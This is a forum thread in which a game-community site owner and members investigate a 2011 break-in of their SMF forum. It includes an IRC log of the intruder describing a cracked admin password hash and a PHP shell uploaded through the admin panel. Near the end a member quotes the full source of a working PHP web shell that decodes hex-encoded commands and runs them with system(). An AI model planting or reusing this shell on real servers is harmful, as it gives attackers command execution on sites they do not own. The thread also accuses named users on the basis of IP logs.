Regarding the MITB hack

This reminds me of a conversation with super_ right after the ‘hack’, where he asked me if I was going into the ‘Lord of the Rings Online’ business. I had no idea how he could have found this out, because I had just installed them for my brother a few nights before, and he is the one who registered the domain name, so it had nothing to do with me (plus he has 3 members and 0 posts as of now, not exactly busy). Looking back on it, it’s pretty obvious how he found out, if you look in my htdocs folder there is lotroland.com

Anyhow, grepping my logs for super_'s IP and filtering out the forum access, he did indeed access the php shells and things used to do all of this, so he looks guilty to me. Upon removing his community member status, I found he gave himself access to all of the secret boards on the forum that we have membergroups for as well. (nothing major, stuff like Cherokee or Hybridscape developer) Also the name of his alternate account, ‘slavemaster’ now is ‘veer’, don’t know if he changed that or another admin did.

So there is mountains of evidence pointing at super_, anyone have any ideas on how it COULDN’T be him?

(I haven’t banned him yet from the forums, but he doesn’t have any status)

edit:
@Wizzup?, I’d recommend you install something like this:

[quote=“Moparisthebest, post:21, topic:414033”]This reminds me of a conversation with super_ right after the ‘hack’, where he asked me if I was going into the ‘Lord of the Rings Online’ business. I had no idea how he could have found this out, because I had just installed them for my brother a few nights before, and he is the one who registered the domain name, so it had nothing to do with me (plus he has 3 members and 0 posts as of now, not exactly busy). Looking back on it, it’s pretty obvious how he found out, if you look in my htdocs folder there is lotroland.com

Anyhow, grepping my logs for super_'s IP and filtering out the forum access, he did indeed access the php shells and things used to do all of this, so he looks guilty to me. Upon removing his community member status, I found he gave himself access to all of the secret boards on the forum that we have membergroups for as well. (nothing major, stuff like Cherokee or Hybridscape developer) Also the name of his alternate account, ‘slavemaster’ now is ‘veer’, don’t know if he changed that or another admin did.

So there is mountains of evidence pointing at super_, anyone have any ideas on how it COULDN’T be him?

(I haven’t banned him yet from the forums, but he doesn’t have any status)

edit:
@Wizzup?, I’d recommend you install something like this:
https://www.moparisthebest.com/smf/index.php/topic,515920.msg3742858.html#new[/quote]A guy called Kevy did it, apparently he uses super_ as a tunnel/proxy. It’s the same guy who got into villavu, and by super_'s own account:
<super_> yea i got into villavu admin panel and made myself have a lot of reps lol

It was “Kevy” who gave him access. Apparently he hasn’t touched this website at all though, that was all this skid. Pretty much what i suspected in the first place.

EDIT: Of course i cannot be 100% certain, but i do trust super_, he’s never lied to me before and i doubt he would start now.

Kevy as in the Rune—Server owner?

[quote=“m.dog311, post:23, topic:414033”]Kevy as in the Rune—Server owner?[/quote]I don’t know. super_ wants to chat with you mitb, join the channel #seckrit on IRC.

[quote=“Moparisthebest, post:21, topic:414033”]edit:
@Wizzup?, I’d recommend you install something like this:

Well, the www-data user had no write permissions at all, so I don’t think anything was changed. But I was indeed looking into something like tripwire.

Now that I’m back on my desktop, here is the full conversation log I had with ‘kevin’ on the day I was fixing the forums, the only thing I edited out is mopman’s old password:

**** BEGIN LOGGING AT Mon Sep 5 04:27:32 2011

Sep 05 04:27:45 hey kevin you got a minute
Sep 05 04:27:53 huh
Sep 05 04:27:55 what’s up
Sep 05 04:28:15 well, you are the one doing this to the forum judging by your IP, so i’d like to know why, and how
Sep 05 04:28:26 what do you mean
Sep 05 04:28:44 you are the one trying to dump the database and changing my files
Sep 05 04:28:54 i have web server logs and such proving it
Sep 05 04:28:58 it’s nothing personal
Sep 05 04:29:15 so what’s the goal here?
Sep 05 04:29:26 boredom
Sep 05 04:29:42 hehe
Sep 05 04:29:49 care to tell me where the hole is?
Sep 05 04:29:56 yeah
Sep 05 04:30:10 your admins
Sep 05 04:30:31 what about them?
Sep 05 04:30:58 they should be more careful
Sep 05 04:31:20 so you just got an admin password and used that to upload your shell script?
Sep 05 04:31:46 ya
Sep 05 04:32:08 i had a password from an old database
Sep 05 04:32:19 ok, I still don’t understand one more thing though
Sep 05 04:32:32 i had all file permissions set to 500
Sep 05 04:32:47 so after i turned the server back on, how did you edit the last file?
Sep 05 04:32:53 SMF allows you change file permissions
Sep 05 04:32:55 which seems kinda dumb
Sep 05 04:32:57 lol
Sep 05 04:33:21 i was tempted to tell you earlier but i wanted to maintain access
Sep 05 04:33:22 i thought it was only with an ftp server
Sep 05 04:33:32 just in case i needed someone from there who had changed their password
Sep 05 04:33:58 you’re lucky since we could have rooted
Sep 05 04:34:19 but we didn’t think anyone would find out so we left it for a few days
Sep 05 04:34:31 i didn’t notice the syntax error when trying to patch the forum
Sep 05 04:34:40 how would you have gotten root access from only the www-data account?
Sep 05 04:35:03 your httpd was running on mopar account previously
Sep 05 04:35:08 and kernel was vulnerable
Sep 05 04:35:22 it never was, they were just members of the same group
Sep 05 04:35:32 oh
Sep 05 04:35:36 well it was in /home/mopar
Sep 05 04:35:38 so i assumed
Sep 05 04:35:40 not anymore though
Sep 05 04:35:50 still you couldn’t have used sudo or anything from www-data
Sep 05 04:35:50 and don’t worry about database
Sep 05 04:35:52 it’s in safe hands
Sep 05 04:35:55 and nothing was set-uid
Sep 05 04:35:55 and won’t be posted any where
Sep 05 04:37:16 we only decided to target forum since i came across an old hash i hadn’t bothered to crack
Sep 05 04:37:19 for your admin
Sep 05 04:38:12 algas?
Sep 05 04:38:26 it was either him or mopman
Sep 05 04:38:28
Sep 05 04:38:53 mopman
Sep 05 04:38:58 **************** was his password
Sep 05 04:39:01 cracked in no time
Sep 05 04:39:19 what was it? md5 with no salt?
Sep 05 04:39:28 salted MD5
Sep 05 04:39:32 from a vbulletin forum
Sep 05 04:41:22 so did you have any other fun files on there i need to remove?
Sep 05 04:41:27 nope
Sep 05 04:42:23 so you are either still lying, or you forgot about xiao.php
Sep 05 04:42:37 i honestly don’t know what that is
Sep 05 04:42:40 lol
Sep 05 04:42:48 it was probably put there by my friend
Sep 05 04:42:48 it was that handy angel script
Sep 05 04:42:54 another copy of it i mean
Sep 05 04:44:09 i considered doing worse stuff to the site since i used to hold a grudge but i felt bad
Sep 05 04:44:13 since it’s only a few users i don’t like
Sep 05 04:44:23 no need to take it out on you and everyone else
Sep 05 04:45:03 so who are you? do you have a site?
Sep 05 04:45:20 i’m kevin and no i don’t have a site
Sep 05 04:45:23 i keep to myself
Sep 05 04:47:49 then why would you have a grudge against the site?
Sep 05 04:48:16 i don’t want to get into that
Sep 05 04:48:54 just curious, there has to be a reason
Sep 05 04:50:10 lol
Sep 05 05:19:34 you gonna put the forums back online?
Sep 05 05:20:00 neat it’s back
Sep 05 05:20:17 don’t forget to change mopman’s pass if you haven’t already
Sep 05 05:20:33 ;p
**** ENDING LOGGING AT Mon Sep 5 05:31:42 2011

Notice how he said him and his ‘friend’ were doing it.

edit:
Here are the logs of super_'s IP accessing the PHP shells and trying to dump the database and such:
http://pastebin.com/Y1L9eKcD

s/*/nth8902gdtnoeau/

whats this for

Obviously it removed the old database password, but I forgot to remove it from the command, oh well, it’s old and was only used there anyhow…

Say it again and you will be permanently banned Frell.

[size=8pt]« Last Edit: Today at 01:39:29 PM by Moparisthebest »[/size]

So the question is, is TX the ‘friend’ he’s talking about, or is it him using a different alias, or what

So is this Kevin from rune–server or is it someone unrelated (as he claims). Also, that’s quite a mountain of evidence against super_…

Also, why does he have somebody tunneling through him? Especially if its someone that is capable of doing harm to a site in which he has elevated status on. In my opinion that makes super at least partially responsible.

why the hell does everyone point to TX as soon as something bad happens? we all know hes a skiddie but he would lack the intelligence to compromise one of our admins or mods…

and Kevin from rune-server would have no reason to do somethingl ike this.

Really guys can we stop pulling a ruler and think before typing.

I assumed that super_ was the ‘friend’, but who knows?

That Kevy is NOT the rune-server owner, they try to make out like he is though. When I found out he wasn’t on IRC the other day, super_ said something like “oh well I thought he was” and tried to brush it off. No idea who he actually is.

I wish I was the owner of google

[quote=“Miss Silabsoft, post:32, topic:414033”]why the hell does everyone point to TX as soon as something bad happens? we all know hes a skiddie but he would lack the intelligence to compromise one of our admins or mods…[/quote]maybe because he told me it was him and did the exact same thing to MY site as well

but that’s exactly the thing TX is 99% talk and if he managed to actually get into your site you must of had a huge vulnerability that almost anyone could of done the same thing.

[quote=“Miss Silabsoft, post:37, topic:414033”]but that’s exactly the thing TX is 99% talk and if he managed to actually get into your site you must of had a huge vulnerability that almost anyone could of done the same thing.[/quote]It’s exactly what happened here. He had access to an admin account, used the theme/package editor to insert a shell into the site he could access (was like [tt]system($_GET[‘lol’])[/tt] or something stupid) and other code, and it happened the same time period as these?

Something like this?

[code]if(isset($_GET[‘sh’])) {
echo “”;
echo “<form name=“encf” onsubmit=“return false;”>”;
echo “<textarea name=“syst” rows=“5” cols=“50”>
”;
echo “<input value=“Execute” onclick=“encstr(this.form.syst.value);” type=“button”>
”;
echo “”;
echo “<form name=“sysf” method=“POST” action=”?x=&sh=">";
echo “<input name=“sys” type=“hidden” value=”">";
echo “

”;

    if(isset($_POST['sys'])) {
        $sys = $_POST['sys'];
        
        for($i = 0; $i < strlen($sys); $i += 2) {
            $cmd .= chr(hexdec(substr($sys, $i, 2)));
        }
        
        echo "<h3>[";
        system("whoami");
        echo "@";
        system("hostname");
        echo "] " . $cmd . "</h3>";
        
        echo "<p><pre>";
        system("(" . $cmd . ") 2>&1");
        echo "</pre></p>";
    }

    die();

}

[/code]

Yes, that exact code (except it actually WAS ‘get[lol]’ instead of sh). I don’t see how TX would have known where on my site it was (he linked me to the shell, at which point I did a complete search of ALL the files on my web server…), unless he was either working with the guy or did it himself.